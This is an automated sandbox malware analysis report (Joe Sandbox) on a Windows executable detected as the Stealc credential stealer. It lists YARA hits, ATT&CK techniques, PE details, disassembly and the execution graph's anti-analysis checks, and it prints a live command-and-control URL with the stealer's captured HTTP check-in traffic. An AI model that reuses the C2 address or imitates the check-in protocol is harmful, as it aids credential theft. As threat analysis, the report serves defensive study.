                Source: Yara matchFile source: 00000000.00000003.2053306343.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2094837133.00000000009AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5248, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts12
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory651
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem334
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://docs.rs/getrandom#nodejs-es-module-support0%URL Reputationsafe
                http://185.215.113.206/6c4adf523b719729.php17%VirustotalBrowse
                http://185.215.113.206/6c4adf523b719729.php.16%VirustotalBrowse
                http://185.215.113.206/6c4adf523b719729.php/18%VirustotalBrowse
                http://185.215.113.206/19%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/6c4adf523b719729.phptrueunknown
                http://185.215.113.206/trueunknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.206/6c4adf523b719729.php.file.exe, 00000000.00000002.2094837133.0000000000A08000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                http://185.215.113.206/6c4adf523b719729.php/file.exe, 00000000.00000002.2094837133.0000000000A08000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                http://185.215.113.206/mfile.exe, 00000000.00000002.2094837133.0000000000A08000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  http://185.215.113.206file.exe, 00000000.00000002.2094837133.00000000009AE000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.206/6c4adf523b719729.phpZfile.exe, 00000000.00000002.2094837133.0000000000A08000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.206/6c4adf523b719729.phpjfile.exe, 00000000.00000002.2094837133.0000000000A08000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://185.215.113.206/wsfile.exe, 00000000.00000002.2094837133.0000000000A08000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          https://docs.rs/getrandom#nodejs-es-module-supportfile.exe, file.exe, 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2053306343.0000000004F6B000.00000004.00001000.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          185.215.113.206
                          		unknownPortugal
                          		206894WHOLESALECONNECTIONSNLtrue

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1544273
                          Start date and time:2024-10-29 07:53:06 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 3m 18s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:2
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@1/0@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 80%
                          • Number of executed functions: 19
                          • Number of non-executed functions: 132
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Stop behavior analysis, all processes terminated

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe

                          Simulations

                          Behavior and APIs

                          No simulations

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          185.215.113.206file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.206/6c4adf523b719729.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/6c4adf523b719729.php
                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Quasar, StealcBrowse
                          • 185.215.113.206/6c4adf523b719729.php
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.206/6c4adf523b719729.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/6c4adf523b719729.php
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.206/6c4adf523b719729.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/6c4adf523b719729.php
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.206/6c4adf523b719729.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/6c4adf523b719729.php
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.206/6c4adf523b719729.php

                          Domains

                          No context

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousLummaCBrowse
                          • 185.215.113.16
                          file.exeGet hashmaliciousLummaCBrowse
                          • 185.215.113.16
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Quasar, StealcBrowse
                          • 185.215.113.16
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousLummaCBrowse
                          • 185.215.113.16
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousLummaCBrowse
                          • 185.215.113.16

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          No created / dropped files found

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.959827929474119
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:2'138'112 bytes
                          MD5:3bdbd89b86e70ca180f24b3acc79bc1f
                          SHA1:a425bb88b0b48ac5b0af08f31dfa241fcd73385b
                          SHA256:13188e8c8ca814a413636036d5fda36f97b41fa969f0e2ac831312bb394cc5bc
                          SHA512:9b3246b83d85ef394efece9d8f09955b21a7469b1da7069702e22a00b9c673e9e593a77c0caecd19850de38bddef94b0a54cae2bd4b3a88d336b87ee1f533be6
                          SSDEEP:49152:5TrijYlI9UoFBhKq4dSCr+c9qlHs2NIQw3:l2+I9VFBhP4dsc2M2N+
                          TLSH:77A5338DF774B964C35A623C06E752D33F30D069737A54B96B2AA6F02C4052DCB28B5C
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...

                          File Icon

                          Icon Hash:00928e8e8686b000

                          Static PE Info

                          General

                          Entrypoint:0xb31000
                          Entrypoint Section:.taggant
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                          Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:1
                          File Version Major:5
                          File Version Minor:1
                          Subsystem Version Major:5
                          Subsystem Version Minor:1
                          Import Hash:2eabe9054cad5152567f0699947a2c5b

                          Entrypoint Preview

                          Instruction
                          jmp 00007FC400D700BAh
                          movd dword ptr [eax], mm4
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add cl, ch
                          add byte ptr [eax], ah
                          add byte ptr [eax], al
                          add byte ptr [ebx], al
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], dl
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [ebx], al
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [ebx], al
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], cl
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add ecx, dword ptr [edx]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al

                          Rich Headers

                          Programming Language:
                          • [C++] VS2010 build 30319
                          • [ASM] VS2010 build 30319
                          • [ C ] VS2010 build 30319
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [LNK] VS2010 build 30319

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x2e90500x64.idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e91f80x8.idata
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          0x10000x2e70000x67600d5bf3b5d2bd2c189d122e095ed0beab2unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc 0x2e80000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata 0x2e90000x10000x200049071433b9f7c843453337b0fd53002False0.1328125data0.8946074494647072IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          0x2ea0000x2a70000x200ee26ed98d9a54390ee290851943a3880unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          fgyethhk0x5910000x19f0000x19f0006d006457d122d0ab17b446864a09c816False0.994837749435241data7.9536291120516625IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          cbzeryut0x7300000x10000x400b7db79b05df4d09e62fccab80ac54decFalse0.755859375data6.052317017259871IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .taggant0x7310000x30000x2200f6bdb2da0ffdd285d81ec90b7eecab4cFalse0.060776654411764705DOS executable (COM)0.7927525394172865IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                          Imports

                          DLLImport
                          kernel32.dlllstrcpy

                          Network Behavior

                          Suricata IDS Alerts

                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                          2024-10-29T07:54:01.532470+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.20680TCP

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Oct 29, 2024 07:54:00.322644949 CET4970480192.168.2.5185.215.113.206
                          Oct 29, 2024 07:54:00.328331947 CET8049704185.215.113.206192.168.2.5
                          Oct 29, 2024 07:54:00.328424931 CET4970480192.168.2.5185.215.113.206
                          Oct 29, 2024 07:54:00.337726116 CET4970480192.168.2.5185.215.113.206
                          Oct 29, 2024 07:54:00.343261957 CET8049704185.215.113.206192.168.2.5
                          Oct 29, 2024 07:54:01.240561008 CET8049704185.215.113.206192.168.2.5
                          Oct 29, 2024 07:54:01.240690947 CET4970480192.168.2.5185.215.113.206
                          Oct 29, 2024 07:54:01.243451118 CET4970480192.168.2.5185.215.113.206
                          Oct 29, 2024 07:54:01.250600100 CET8049704185.215.113.206192.168.2.5
                          Oct 29, 2024 07:54:01.532361031 CET8049704185.215.113.206192.168.2.5
                          Oct 29, 2024 07:54:01.532469988 CET4970480192.168.2.5185.215.113.206
                          Oct 29, 2024 07:54:04.349407911 CET4970480192.168.2.5185.215.113.206

                          HTTP Request Dependency Graph

                          • 185.215.113.206

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.549704185.215.113.206805248C:\Users\user\Desktop\file.exe
                          TimestampBytes transferredDirectionData
                          Oct 29, 2024 07:54:00.337726116 CET90OUTGET / HTTP/1.1
                          Host: 185.215.113.206
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Oct 29, 2024 07:54:01.240561008 CET203INHTTP/1.1 200 OK
                          Date: Tue, 29 Oct 2024 06:54:01 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                          Oct 29, 2024 07:54:01.243451118 CET413OUTPOST /6c4adf523b719729.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----KJKJKFCBKKJDGDHIDBGI
                          Host: 185.215.113.206
                          Content-Length: 211
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4b 46 43 42 4b 4b 4a 44 47 44 48 49 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 36 38 44 36 30 37 39 42 41 45 32 33 39 32 34 36 39 36 33 33 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4b 46 43 42 4b 4b 4a 44 47 44 48 49 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4b 46 43 42 4b 4b 4a 44 47 44 48 49 44 42 47 49 2d 2d 0d 0a
                          Data Ascii: ------KJKJKFCBKKJDGDHIDBGIContent-Disposition: form-data; name="hwid"C68D6079BAE23924696330------KJKJKFCBKKJDGDHIDBGIContent-Disposition: form-data; name="build"tale------KJKJKFCBKKJDGDHIDBGI--
                          Oct 29, 2024 07:54:01.532361031 CET210INHTTP/1.1 200 OK
                          Date: Tue, 29 Oct 2024 06:54:01 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 8
                          Keep-Alive: timeout=5, max=99
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 59 6d 78 76 59 32 73 3d
                          Data Ascii: YmxvY2s=


                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          System Behavior

                          General

                          Target ID:0
                          Start time:02:53:57
                          Start date:29/10/2024
                          Path:C:\Users\user\Desktop\file.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\file.exe"
                          Imagebase:0xe40000
                          File size:2'138'112 bytes
                          MD5 hash:3BDBD89B86E70CA180F24B3ACC79BC1F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2053306343.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2094837133.00000000009AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Disassembly

                          Reset < >

                            Execution Graph

                            Execution Coverage:3%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:3.5%
                            Total number of Nodes:1327
                            Total number of Limit Nodes:24
                            execution_graph 37713 e56c90 37758 e422a0 37713->37758 37737 e56d04 37738 e5acc0 4 API calls 37737->37738 37739 e56d0b 37738->37739 37740 e5acc0 4 API calls 37739->37740 37741 e56d12 37740->37741 37742 e5acc0 4 API calls 37741->37742 37743 e56d19 37742->37743 37744 e5acc0 4 API calls 37743->37744 37745 e56d20 37744->37745 37910 e5abb0 37745->37910 37747 e56dac 37914 e56bc0 GetSystemTime 37747->37914 37749 e56d29 37749->37747 37751 e56d62 OpenEventA 37749->37751 37753 e56d95 CloseHandle Sleep 37751->37753 37754 e56d79 37751->37754 37755 e56daa 37753->37755 37757 e56d81 CreateEventA 37754->37757 37755->37749 37756 e56db6 CloseHandle ExitProcess 37757->37747 38111 e44610 37758->38111 37760 e422b4 37761 e44610 2 API calls 37760->37761 37762 e422cd 37761->37762 37763 e44610 2 API calls 37762->37763 37764 e422e6 37763->37764 37765 e44610 2 API calls 37764->37765 37766 e422ff 37765->37766 37767 e44610 2 API calls 37766->37767 37768 e42318 37767->37768 37769 e44610 2 API calls 37768->37769 37770 e42331 37769->37770 37771 e44610 2 API calls 37770->37771 37772 e4234a 37771->37772 37773 e44610 2 API calls 37772->37773 37774 e42363 37773->37774 37775 e44610 2 API calls 37774->37775 37776 e4237c 37775->37776 37777 e44610 2 API calls 37776->37777 37778 e42395 37777->37778 37779 e44610 2 API calls 37778->37779 37780 e423ae 37779->37780 37781 e44610 2 API calls 37780->37781 37782 e423c7 37781->37782 37783 e44610 2 API calls 37782->37783 37784 e423e0 37783->37784 37785 e44610 2 API calls 37784->37785 37786 e423f9 37785->37786 37787 e44610 2 API calls 37786->37787 37788 e42412 37787->37788 37789 e44610 2 API calls 37788->37789 37790 e4242b 37789->37790 37791 e44610 2 API calls 37790->37791 37792 e42444 37791->37792 37793 e44610 2 API calls 37792->37793 37794 e4245d 37793->37794 37795 e44610 2 API calls 37794->37795 37796 e42476 37795->37796 37797 e44610 2 API calls 37796->37797 37798 e4248f 37797->37798 37799 e44610 2 API calls 37798->37799 37800 e424a8 37799->37800 37801 e44610 2 API calls 37800->37801 37802 e424c1 37801->37802 37803 e44610 2 API calls 37802->37803 37804 e424da 37803->37804 37805 e44610 2 API calls 37804->37805 37806 e424f3 37805->37806 37807 e44610 2 API calls 37806->37807 37808 e4250c 37807->37808 37809 e44610 2 API calls 37808->37809 37810 e42525 37809->37810 37811 e44610 2 API calls 37810->37811 37812 e4253e 37811->37812 37813 e44610 2 API calls 37812->37813 37814 e42557 37813->37814 37815 e44610 2 API calls 37814->37815 37816 e42570 37815->37816 37817 e44610 2 API calls 37816->37817 37818 e42589 37817->37818 37819 e44610 2 API calls 37818->37819 37820 e425a2 37819->37820 37821 e44610 2 API calls 37820->37821 37822 e425bb 37821->37822 37823 e44610 2 API calls 37822->37823 37824 e425d4 37823->37824 37825 e44610 2 API calls 37824->37825 37826 e425ed 37825->37826 37827 e44610 2 API calls 37826->37827 37828 e42606 37827->37828 37829 e44610 2 API calls 37828->37829 37830 e4261f 37829->37830 37831 e44610 2 API calls 37830->37831 37832 e42638 37831->37832 37833 e44610 2 API calls 37832->37833 37834 e42651 37833->37834 37835 e44610 2 API calls 37834->37835 37836 e4266a 37835->37836 37837 e44610 2 API calls 37836->37837 37838 e42683 37837->37838 37839 e44610 2 API calls 37838->37839 37840 e4269c 37839->37840 37841 e44610 2 API calls 37840->37841 37842 e426b5 37841->37842 37843 e44610 2 API calls 37842->37843 37844 e426ce 37843->37844 37845 e59bb0 37844->37845 38116 e59aa0 GetPEB 37845->38116 37847 e59bb8 37848 e59de3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 37847->37848 37849 e59bca 37847->37849 37850 e59e44 GetProcAddress 37848->37850 37851 e59e5d 37848->37851 37852 e59bdc 21 API calls 37849->37852 37850->37851 37853 e59e96 37851->37853 37854 e59e66 GetProcAddress GetProcAddress 37851->37854 37852->37848 37855 e59e9f GetProcAddress 37853->37855 37856 e59eb8 37853->37856 37854->37853 37855->37856 37857 e59ec1 GetProcAddress 37856->37857 37858 e59ed9 37856->37858 37857->37858 37859 e56ca0 37858->37859 37860 e59ee2 GetProcAddress GetProcAddress 37858->37860 37861 e5aa50 37859->37861 37860->37859 37862 e5aa60 37861->37862 37863 e56cad 37862->37863 37864 e5aa8e lstrcpy 37862->37864 37865 e411d0 37863->37865 37864->37863 37866 e411e8 37865->37866 37867 e41217 37866->37867 37868 e4120f ExitProcess 37866->37868 37869 e41160 GetSystemInfo 37867->37869 37870 e41184 37869->37870 37871 e4117c ExitProcess 37869->37871 37872 e41110 GetCurrentProcess VirtualAllocExNuma 37870->37872 37873 e41141 ExitProcess 37872->37873 37874 e41149 37872->37874 38117 e410a0 VirtualAlloc 37874->38117 37877 e41220 38121 e58b40 37877->38121 37880 e41249 __aulldiv 37881 e4129a 37880->37881 37882 e41292 ExitProcess 37880->37882 37883 e56a10 GetUserDefaultLangID 37881->37883 37884 e56a73 37883->37884 37885 e56a32 37883->37885 37891 e41190 37884->37891 37885->37884 37886 e56a57 ExitProcess 37885->37886 37887 e56a61 ExitProcess 37885->37887 37888 e56a43 ExitProcess 37885->37888 37889 e56a4d ExitProcess 37885->37889 37890 e56a6b ExitProcess 37885->37890 37890->37884 37892 e57a70 3 API calls 37891->37892 37894 e4119e 37892->37894 37893 e411cc 37898 e579e0 GetProcessHeap RtlAllocateHeap GetUserNameA 37893->37898 37894->37893 37895 e579e0 3 API calls 37894->37895 37896 e411b7 37895->37896 37896->37893 37897 e411c4 ExitProcess 37896->37897 37899 e56cd0 37898->37899 37900 e57a70 GetProcessHeap RtlAllocateHeap GetComputerNameA 37899->37900 37901 e56ce3 37900->37901 37902 e5acc0 37901->37902 38123 e5aa20 37902->38123 37904 e5acd1 lstrlen 37905 e5acf0 37904->37905 37906 e5ad28 37905->37906 37908 e5ad0a lstrcpy lstrcat 37905->37908 38124 e5aab0 37906->38124 37908->37906 37909 e5ad34 37909->37737 37911 e5abcb 37910->37911 37912 e5ac1b 37911->37912 37913 e5ac09 lstrcpy 37911->37913 37912->37749 37913->37912 38128 e56ac0 37914->38128 37916 e56c2e 37917 e56c38 sscanf 37916->37917 38157 e5ab10 37917->38157 37919 e56c4a SystemTimeToFileTime SystemTimeToFileTime 37920 e56c80 37919->37920 37921 e56c6e 37919->37921 37923 e55d60 37920->37923 37921->37920 37922 e56c78 ExitProcess 37921->37922 37924 e55d6d 37923->37924 37925 e5aa50 lstrcpy 37924->37925 37926 e55d7e 37925->37926 38159 e5ab30 lstrlen 37926->38159 37929 e5ab30 2 API calls 37930 e55db4 37929->37930 37931 e5ab30 2 API calls 37930->37931 37932 e55dc4 37931->37932 38163 e56680 37932->38163 37935 e5ab30 2 API calls 37936 e55de3 37935->37936 37937 e5ab30 2 API calls 37936->37937 37938 e55df0 37937->37938 37939 